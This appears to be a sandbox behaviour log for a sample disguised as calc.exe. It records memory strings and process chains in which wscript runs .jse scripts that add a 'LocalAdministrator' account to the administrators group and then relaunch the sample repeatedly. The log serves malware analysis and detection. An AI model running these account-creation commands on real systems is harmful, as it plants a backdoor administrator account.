Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: wscript.exe String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");
Source: C:\Users\user\Desktop\calc.exe File read: C:\Users\user\Desktop\calc.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JI8Y5YVUqE.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: unknown Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" B2G43eAZZY.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fpiLr93KlC.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" WQTz1XtcXV.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" BjFMi3zobq.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Xv6oI7oFep.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 5RDffnTbZa.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xIrKq0jy1l.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" bBF4cMvje3.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xdbrdZA2Mp.jse
Source: C:\Windows\SysWOW64\net1.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net1.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net1.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 7s3912SDjb.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" dIsc26ydj8.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 7G6GlIeRfv.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" AiCGETgrpF.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" FB3eszo6iK.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 90NgPeo2cD.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JEsdrI4PXS.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" argZvAmXhN.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: unknown Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" RBRDMGZ065.jse
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" ikKn7NiVR4.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" GEWDiMGgJw.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" zoIZ7M03Hi.jse
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" auMkVSqKRe.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Users\user\Desktop\calc.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" LQzxvucZpT.jse
Source: unknown Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net1.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net1.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add
Source: C:\Windows\SysWOW64\net1.exe Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe"
Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" F0YCw5KB4j.jse
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add
